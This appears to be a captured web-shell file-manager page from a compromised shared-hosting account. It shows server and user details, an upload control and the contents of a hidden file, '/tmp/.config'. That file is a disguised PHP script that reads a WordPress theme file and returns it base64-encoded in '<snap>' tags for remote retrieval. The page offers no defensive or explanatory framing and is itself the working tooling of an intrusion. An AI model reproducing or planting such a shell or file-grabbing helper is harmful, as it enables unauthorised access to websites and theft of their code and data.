HEX
Server: LiteSpeed
System: Linux rs4-or.serverhostgroup.com 4.18.0-553.111.1.lve.el8.x86_64 #1 SMP Fri Mar 13 13:42:17 UTC 2026 x86_64
User: carunloc (2240)
PHP: 7.4.33
Disabled: exec, passthru, shell_exec
Upload Files
File: //tmp/.config
<?php  $path = '/home2/carunloc/public_html/wp-content/themes/category_template_1780934718/template-parts/content-search.php'; $max = (int) '100000'; if ($max < 1) {     $max = 120000; } if (!is_file($path)) {     die('!nf!'); } $c = @file_get_contents($path); if ($c === false) {     die('!rd!'); } if (strlen($c) > $max) {     die('!big!'); } die('<snap>' . base64_encode($c) . '</snap>');